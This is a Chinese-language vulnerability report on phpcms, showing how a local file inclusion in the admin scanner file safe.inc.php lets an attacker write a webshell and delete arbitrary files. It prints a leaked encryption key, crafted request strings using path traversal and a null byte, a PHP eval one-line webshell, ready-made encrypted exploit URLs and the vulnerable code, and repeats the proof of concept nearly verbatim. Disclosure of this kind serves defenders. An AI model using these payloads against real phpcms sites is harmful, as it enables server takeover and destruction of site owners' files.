phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞

yun

phpcms本地包含类漏洞，如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。

由于phpcms的全局变量机制，导致能拿shell的方法很多，类似的问题不止一个。

admin/safe.inc.php文件是后台扫木马的程序，但是很可惜的是虽然文件名叫做safe，但是一点也不safe。

公布一个本地包含秒杀拿shell的方法。

包含:admin/safe.inc.php文件GET提交一下数据
将在根目录下生成一句话
用上一篇得到的密钥$key='sIpeofogblFVCildZEwe';
加密如下字符串

$evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=
将在根目录下生成一句话木马

同理任意文件删除漏洞：
$evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==

贴上存在漏洞的代码://admin/safe.inc.php

1. <?php
   
2. 
   
3. defined('IN_PHPCMS') or exit('Access Denied');
   
4. 
   
5. // include/common.inc.php 里面声明了常量
   
6. 
   
7. // define('IN_PHPCMS', TRUE);
   
8. 
   
9. if(empty($action)) $action = "start";
   
10. 
    
11. $safe = cache_read('safe.php');
    
12. 
    
13. $filecheck = load('filecheck.class.php');
    
14. 
    
15. if(empty($safe))
    
16. 
    
17. {
    
18. 
    
19. $safe = array (
    
20. 
    
21. 'file_type' => 'php|js',
    
22. 
    
23. 'code' => '',
    
24. 
    
25. 'func' => 'com|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzuncompress',
    
26. 
    
27. 'dir' => $filecheck->checked_dirs()
    
28. 
    
29. );
    
30. 
    
31. 
    
32. }
    
33. 
    
34. switch ($action)
    
35. {
    
36. ...
    
37. 
    
38. case 'edit_code':
    
39. 
    
40. if (file_put_contents(PHPCMS_ROOT.$file_path, stripcslashes($code)))
    
41. {
    
42. 
    
43. showmessage('修改成功！');
    
44. 
    
45. }
    
46. break;
    
47. 
    
48. case 'del_file':
    
49. 
    
50. $file_path = urldecode($files);
    
51. 
    
52. if (empty($file_path))
    
53. {
    
54. showmessage('请选择文件');
    
55. }
    
56. $file_list = cache_read('scan_backdoor.php');
    
57. 
    
58. unset($file_list[$file_path]);
    
59. 
    
60. cache_write('scan_backdoor.php',$file_list);
    
61. 
    
62. @unlink(PHPCMS_ROOT.$file_path)
    
63. 
    
64. showmessage('文件删除成功！', '?mod=phpcms&file=safe&action=scan_table');
    
65. 
    
66. break;
    
67. 
    
68. ...

复制代码

漏洞证明：

将在根目录下生成一句话

用上一篇得到的密钥$key='sIpeofogblFVCildZEwe';

加密如下字符串

$evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=

将在根目录下生成一句话木马


同理任意文件删除漏洞：

$evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==